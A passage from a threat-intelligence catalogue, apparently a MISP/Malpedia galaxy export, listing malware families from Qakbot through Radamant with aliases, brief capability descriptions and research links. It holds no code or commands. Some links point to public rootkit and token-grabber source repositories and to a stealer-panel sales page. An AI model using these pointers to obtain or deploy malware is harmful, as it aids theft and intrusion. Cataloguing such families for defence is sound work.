https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.spamhaus.org/news/article/819/qakbot-the-takedown-and-the-remediation

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot

https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html

https://www.youtube.com/watch?v=OCRyEUhiEyw

https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga

http://contagiodump.blogspot.com/2010/11/template.html

https://securelist.com/qakbot-technical-analysis/103931/

https://twitter.com/tylabs/status/1462195377277476871

https://web.archive.org/web/20120206174705/http://blogs.rsa.com/rsafarl/businesses-beware-qakbot-spreads-like-a-worm-stings-like-a-trojan/

https://www.malwarology.com/2022/04/qakbot-series-process-injection/

https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html

https://www.circl.lu/pub/tr-64/

https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/

https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks

https://blog.quosec.net/posts/grap_qakbot_navigation/

https://malwareandstuff.com/upnp-messing-up-security-since-years/

https://krebsonsecurity.com/2023/08/u-s-hacks-qakbot-quietly-removes-botnet-infections/

https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/

https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://twitter.com/TheDFIRReport/status/1361331598344478727

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://web.archive.org/web/20130530033754/http://www.symantec.com/connect/blogs/qakbot-steals-2gb-confidential-data-week

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails

https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros

https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/

https://hatching.io/blog/reversing-qakbot

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf

https://labs.k7computing.com/index.php/qakbot-returns/

https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/

https://web.archive.org/web/20110909041410/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-i

https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf

https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques

https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques

https://www.youtube.com/watch?v=4I0LF8Vm7SI

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://www.atomicmatryoshka.com/post/malware-headliners-qakbot

https://www.malwarology.com/2022/04/qakbot-series-api-hashing/

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken—​the-resurgence-of-the-emotet-botnet-malw.html

http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html

https://www.justice.gov/d9/2023-08/23mj4244_application_redacted.pdf

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/

https://www.youtube.com/watch?v=M22c1JgpG-U

https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown

https://www.malwarology.com/posts/2-qakbot-conf-extraction/

https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/

https://bin.re/blog/the-dga-of-qakbot/

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://d01a.github.io/pikabot/

https://redcanary.com/blog/intelligence-insights-november-2021/

https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

https://twitter.com/elisalem9/status/1381859965875462144

https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature

https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/

https://www.shadowserver.org/news/qakbot-botnet-disruption/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html

https://www.elastic.co/security-labs/qbot-configuration-extractor

https://experience.mandiant.com/trending-evil/p/1

https://isc.sans.edu/diary/rss/28448

https://twitter.com/redcanary/status/1334224861628039169

https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html

https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/

https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/

https://www.secureworks.com/blog/law-enforcement-takes-down-qakbot

https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/

https://twitter.com/alex_il/status/1384094623270727685

https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/

https://twitter.com/Corvid_Cyber/status/1455844008081641472

https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html

https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.secureworks.com/research/threat-profiles/gold-lagoon

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown

https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html

https://isc.sans.edu/diary/rss/26862

https://www.malwarology.com/posts/4-qakbot-api-hashing/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html

https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps

QHost

The tag is: misp-galaxy:malpedia="QHost"

QHost is also known as:

  • Tolouge

Table 4355. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost

QUARTERRIG

A stager used by APT29 to download and run CobaltStrike. Here, MUSKYBEAT refers to the in-memory dropper component, while STATICNOISE is the final payload / downloader.

The tag is: misp-galaxy:malpedia="QUARTERRIG"

QUARTERRIG is also known as:

  • MUSKYBEAT

  • STATICNOISE

Table 4358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77

Quasar RAT

Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.

The tag is: misp-galaxy:malpedia="Quasar RAT"

Quasar RAT is also known as:

  • CinaRAT

  • QuasarRAT

  • Yggdrasil

Table 4359. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

https://blog.malwarelab.pl/posts/venom/

https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://blog.minerva-labs.com/trapping-quasar-rat

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf

https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ

https://embee-research.ghost.io/hunting-quasar-rat-shodan

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://blog.ensilo.com/uncovering-new-activity-by-apt10

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html

http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://twitter.com/struppigel/status/1130455143504318466

https://embee-research.ghost.io/shodan-censys-queries/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://blog.morphisec.com/syk-crypter-discord

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?

https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques

https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html

https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://asec.ahnlab.com/en/31089/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848

https://securelist.com/apt-trends-report-q1-2021/101967/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat

https://blog.reversinglabs.com/blog/rats-in-the-library

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.antiy.cn/research/notice&report/research_report/20201228.html

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://twitter.com/malwrhunterteam/status/789153556255342596

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/

https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/

https://www.youtube.com/watch?v=yimh33nSOt8

https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html

https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/

https://intel471.com/blog/privateloader-malware

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

QUICKMUTE

QuickMute is a malware developed using the C/C++ programming language. Functionally provides download, RC4 decryption, and in-memory launch of the payload (waiting for a PE file with the export function "HttpsVictimMain"). To communicate with the management server, a number of protocols are provided, in particular: TCP, UDP, HTTP, HTTPS.

The tag is: misp-galaxy:malpedia="QUICKMUTE"

QUICKMUTE is also known as:

Table 4361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute

https://cert.gov.ua/article/375404

QuietSieve

According to Microsoft, this is a heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host. But it can also receive and execute a remote payload from the operator.

The tag is: misp-galaxy:malpedia="QuietSieve"

QuietSieve is also known as:

Table 4363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quietsieve

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

QuiteRAT

QuiteRAT is a simple remote access trojan written with the help of Qt libraries.

After sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.

It was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).

The tag is: misp-galaxy:malpedia="QuiteRAT"

QuiteRAT is also known as:

  • Acres

Table 4364. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat

https://blog.talosintelligence.com/lazarus-quiterat/

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://asec.ahnlab.com/ko/56256/

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

Qulab

Qulab is an AutoIT Malware focusing on stealing & clipping content from victim’s machines.

The tag is: misp-galaxy:malpedia="Qulab"

Qulab is also known as:

Table 4365. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab

https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/

QvoidStealer

The tag is: misp-galaxy:malpedia="QvoidStealer"

QvoidStealer is also known as:

  • Qvoid-Token-Grabber

Table 4366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qvoidstealer

https://github.com/Enum0x539/Qvoid-Token-Grabber

r77

According to the author, r77 is a ring 3 rootkit that hides everything: * Files, directories * Processes & CPU usage * Registry keys & values * Services * TCP & UDP connections * Junctions, named pipes, scheduled tasks

The tag is: misp-galaxy:malpedia="r77"

r77 is also known as:

  • r77 Rootkit

Table 4367. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.r77

https://twitter.com/malmoeb/status/1523179260273254407

https://github.com/bytecode77/r77-rootkit

r980

The tag is: misp-galaxy:malpedia="r980"

r980 is also known as:

Table 4368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.r980

https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/

Raccoon

Raccoon Stealer is a malware reportedly sold for $75 a week or $200 a month. It gathers personal information including passwords, browser cookies and autofill data, as well as cryptowallet details. Additionally, Raccoon Stealer records system information such as IP addresses and geo-location data.

The tag is: misp-galaxy:malpedia="Raccoon"

Raccoon is also known as:

  • Mohazo

  • RaccoonStealer

  • Racealer

  • Racoon

Table 4369. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://www.group-ib.com/blog/fakesecurity_raccoon

https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949

https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://d01a.github.io/raccoon-stealer/

https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://ke-la.com/information-stealers-a-new-landscape/

https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/

https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/

https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/

https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/

https://twitter.com/GroupIB_GIB/status/1570821174736850945

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer

https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block

https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/

https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf

https://www.youtube.com/watch?v=5KHZSmBeMps

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/

https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.youtube.com/watch?v=1dbepxN2YD8

https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d[https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d]

https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view

https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon

https://www.youtube.com/watch?v=kfl_2_NBVGc

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/

https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/

https://asec.ahnlab.com/ko/25837/

https://www.riskiq.com/blog/labs/magecart-medialand/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://asec.ahnlab.com/en/35981/

https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/

https://cyberint.com/blog/financial-services/raccoon-stealer/

https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation

https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/

https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b

https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html

https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram

Racket Downloader

Racket Downloader is an HTTP(S) downloader.

It uses a custom substitution cipher for decryption of its character strings, and RC5 with a 256-bit key for encryption and decryption of network traffic.

It sends an HTTP POST request containing a particular value that inspired its name, like "?product_field=racket" or "prd_fld=racket".

Racket Downloader was deployed against South Korean targets running the Initech INISAFE CrossWeb EX software in Q2 2021 and Q1 2022.

The tag is: misp-galaxy:malpedia="Racket Downloader"

Racket Downloader is also known as:

Table 4370. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.racket

https://asec.ahnlab.com/en/33801/

https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12

https://asec.ahnlab.com/ko/40495/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

Radamant

The tag is: misp-galaxy:malpedia="Radamant"

Radamant is also known as:

Table 4372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant

RadRAT

